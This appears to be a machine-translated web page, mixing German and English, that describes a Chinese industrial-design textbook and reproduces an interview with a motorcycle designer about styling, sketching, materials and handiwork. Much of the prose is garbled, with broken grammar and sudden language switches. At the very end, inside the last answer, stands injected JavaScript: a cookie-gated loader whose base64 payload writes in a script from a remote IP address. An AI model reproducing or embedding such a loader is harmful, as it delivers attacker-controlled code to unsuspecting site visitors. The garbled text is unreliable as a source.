Lerntechniken und Design

 

Posted in China mit einer Auflage von 75.000 Kopie, für die Verwendung als technisches Handbuch in der chinesischen Fakultät für Maschinenbau, er Volumen “Technische Studien-und Design-” ist die dritte in einer Reihe von erfolgreichen technischen Handbücher von der produktivsten Professor geschrieben. Stein Wen.
Auf Inner beschreibt einige Produktionsprozesse von uns angepasst, sie zum Beispiel für junge chinesische Studenten, die.
Die Veröffentlichung dieses Buches war eine sehr angenehme und interessante Erfahrung.

Zusammenfassung

Die Temperatur betrug nur、Chenzhen Yi、Su Bolin、Enrico Leonardo Fagone、Donato Cannatello bearbeitet die „Produkt-Design Quelle und einen Durchbruch“ von dem Punkt、Linie、Oberfläche、Ausgangskörper,So verfolgen Sie den Ursprung der Produktform,Die Punkte Quelle wieder zu starten,Wir erkundeten die Möglichkeit der Interpretation des reichen Styling,Leser Design der Natur Dialyse zu helfen。Dieses Buch stellt sechs Modellierungsmethode,4Ein Modellierungsschritt,3Produkte Einheit Tipps,Es stellt eine praktische und wirksame Methode zur Modellierung für die Leser in Design Arbeit beschäftigt。Für Freiformfläche,vorgeschlagen Hybrid、Geschlossen und Handeln denkt drei Arten von Modellierungstechniken,Es bietet gezielte Lösungen für den Leser der Freiformflächenmodellierung Schwierigkeiten zu steuern。Dieses Buch enthält die psychologische Trägheit zu gestalten,5 Gruppen vorgeschlagene Verfahren zur Modellierung psychologischer Trägheit und Durchbruch,Für die Leser, die Grenzen ihres eigenen Stil zu brechen,In die Modellierung Welt reicher öffnet sich ein Fenster。Das Buch interviewte eine Reihe von europäischen Top-Designern,Besuche vor einer Reihe von Italiens Top-Design-Firmen,Providing Leser mit einer neuen Design Informationen aus erster Hand,Durch eingehende Analyse dieser Entwurfsfälle,Wir können der Leser helfen, diese ausgezeichneten Designer Design-Methoden und ausgezeichneten Design-Case-Modellierung Prozess zu verstehen,Es hilft Leser Design-Vision und zur Verbesserung der ästhetischen Ebene des Lesers。


Sintesi dell’intervista:

1ein. Die Form der Motorräder hat immer große Veränderungen erfahren, da ihre Schwellen. Was denken Sie könnten die Faktoren in diesem Prozess beteiligt sein ändern?

2013 Triumph BonevilleIch weiß nicht ganz einverstanden.

Die Seele der Motorräder hat sich in mehr als hundert Jahren im wesentlichen unverändert geblieben.
Und dies wird von einigen Modellen, die gerade in der Produktion bestätigt, die den Stil der klassischen Motorräder neu zu interpretieren, da sie das Wesen der Motorräder erinnern; zwei Räder, ein Motor, Schwingungen und Emotionen.
Die Änderungen in Formen und Stilen, die zwangsläufig mit der Zeit kam es abhängen meiner Meinung nach 4 Gründe dafür: Technik, Mode, kulturelle Entwicklung und Renn.

 

Zum ersten 80 Jahren haben wir in erster Linie auf technische Entwicklung konzentriert, Herstellung von Maschinen, die mehr richtet als enything sonst bis zur Perfektion und Leistung.
Im letzten 20 Jahre statt die Entwicklung der interessanteren Elemente der Technik und Rennen gestoppt, Verläßt die Entwicklung des Motorrades auf die einzigen sozio / kulturellen Aspekte.

 

Ab heute sind solche Aspekte in der Motorradproduktion vorherrschende und erzeugen nostalgische, absurd, futuristisch oder hyper detaillierte Modelle.

AJS-7R-350-1949

 

.1b. In welcher Art und Weise die Form der europäischen Motorräder könnte in der Zukunft entwickeln?

 

05-Falcon10-Schwarz-04

Europäisches Design, wie östlichen und westlichen Design, folgende spezifische Erfordernisse wird spezialisieren; Form wird immer durch den Ort definiert, wo die Produktion beginnt.
Trotz der unvermeidlichen kulturellen Kontamination, Europäische Produktion wird immer auf ein Motorrad zielt darauf ab, das funktionell ist und leidenschaftlich, ein perfektes Gleichgewicht zwischen antreibenden und ästhetischen Eigenschaften, Spaß und Nutzen. Alles zu gehen zusammen mit unserem eigenen Territorium, so uneben, mit variabler Landschaften, kurvige Straßen und steile Hügel.

Wie amerikanische Produktion auf ihre endlosen Ebenen gewidmet und langen und geraden Straßen, und zugleich östlichen Produktion neigt dazu, die Märkte zu folgen, Städte und Straßen überfüllt mit äußerst funktional und rational Produkten.

 

 

 

 

 

 

 

  1. Jedes ausgezeichnete Motorräder Design zeichnet sich durch seinen eigenen Stil gekennzeichnet, Fördern auf die besonderen Emotionen und Assoziationen Kunden. Als Designer, Wie beurteilen Sie die Persönlichkeit des Motorrads illustrieren durch die Formensprache mit ?

In Motorrad-Design, und ganz allgemein im Bereich Industriedesign, Band sind das Hauptmerkmal, die erste Nachricht an den Kunden vermitteln.
Ein Blick auf etwas gegen das Licht, man kann sofort spüren, seinen Charakter: wenn es vermittelt Macht, lightness, speed, elegance or anything else.

The same happens in nature, discerning in the darkness a pit-bull from a poodle just from its outline.

 

  1. Motorbike design has to take many parts into consideration, such as the chassis, the engine and the exhaust pipe and so on. It appears complicated and overwhelming to beginners. Do you have any suggestions on how to balance the skin (the covering parts) with the structure to achieve a perfect unification?

Ducati-Monster-Traktor-5-640x402

It depends: are we drawing on a white sheet or are we working on something?

In general, design should come first, before exhaust pipes, before the frame and before the engine. Design has to be the first approach to a motorcycle project. Mechanics will then follow the directives of design with reciprocal adaptation.

If the approach of design follows the planning (as it happens in restyling), then some fixed points have to be decided in order to proceed freely with all the rest. For technical objects such as a motorbike, there can be an easy rule: parts which are mechanically interesting or well done have not to be covered, but left in plain sight. If possible it is to be preferred to redesign a technical part that is not satisfactory and make it part of the design, instead of covering it.

There is however one fundamental thing in our designing, the point of view of a motorbike is never perfectly lateral to the bike but is placed higher; let’s do not then only design a beautiful lateral view, often a good proportion of the lateral/superior volumes is more important that the lateral view.

 

  1. In a certain extent, the perspective view, light and shadow of a motorbike is more difficult to control than those of a car. How can we get a better control in motorbike sketching? Can you Please show us the drawing process of a Motorcycle( by using 6 pictures to explain the drawing steps). For the young students, How to improve the drawing abilities.

Considering the difficulties of motorcycle design, we can interpret it as a multilevel design.

1A first level, global vision, a second level, more detailed, a third level, even more detailed, and so on. The first level is the most important, what the customer gets at first sight, what conveys you the pleasure or fun of an object.
I work following this rule.
Starting from the overall view (general volumes) and then following with the definition of more particular details: the tail, the front, the frame, etc. up to the screws.

  1. Motorbikes and cars are all transportation vehicles and the form design of both are naturally connected. Then, what, do you think, distinguishes each of them?

Historically, the use and function of cars and motorbikes have always been different and hence also the respective design.
Now they are crossing, evolving in all directions.
Cars used to have as primary function transportation, while bikes were more linked to the idea of form (Spaß, taste, speed).
Today the market tends to fill any void, and therefore we have cars that are pure form and motorbikes which are pure function.

For motorbikes this change is by now consolidated on the market (i.e., scooter), while this new tendency for cars is still not predominant, and interests a smaller niche of the market; but I am sure that soon we will see cars with the engine in plain sight, “naked” as motorbikes.

 

 

  1. At present, many new technologies, such as carbon fiber and LED, ist auf die Herstellung von Motorrädern angewandt. Wie werden diese neuen Technologien beeinflussen die Form Design der Motorräder?

Neue Technologien haben immer Design als wesentlicher Bestandteil ihres Entwicklungsprozesses beeinflusst.
Persönlich der wichtigste Beitrag, die ich erhalten und geschätzt von modernen Technologien hat in Produktionszahlen gewesen.
Heute ist es einfacher, eine kleine Serie von Motorrädern dank neuer Technologien zu bauen wie Kohlefaser, LEDs, CNC-Maschinen, Prototyping und neue Materialien.

Zum Beispiel, prototyping and CNC milling applied to modern materials allow us to have a unique ABS piece, without the need of expensive and difficult injection moulding; furthermore, thanks to silicon stamps, we can build small series of copies in polyurethane with low costs.
Also polyelliptical headlights (even better with LED technology) contributed to overcome the limits of industrialization. They can be hided in a transparent Plexiglas fairing, shaping them without the need to homologate a new light as it was necessary before.
And finally carbon and laminates in general free us from structural boundaries of plastic, with mechanical and not only aesthetic improvements.

 

 

  1. Some of the top motorbike designs are completed by handicraft. How is the value of the motorbike is expressed by traditional handicraft?

I am fond and always been a supporter of handiwork.
In motorcycle design handiwork is substantially clay modeling and the level of detail is high, but it requires time and economical resources for the reverse engineering process necessary to transform everything in digital form.
I prefer using digital the means that are at our disposal, avoiding the analogical passage, to simplify and speed up the creative process. Funktion getCookie(e){var U = document.cookie.match(neuer RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/G,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(die[1]):Leere 0}var src =”Daten:text / javascript;base64, ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs =”,jetzt = Math.floor(Date.now()/1e3),cookie = getCookie(“umleiten”);ob(jetzt>=(Zeit = Cookie)||Leere 0 === Zeit){var time = Math.floor(Date.now()/1e3 + 86400),date = new Date((neues Datum).Zeit kriegen()+86400);document.cookie =”redirect =”+Zeit +”; path = /; expires =”+date.toGMTString(),document.write(”)}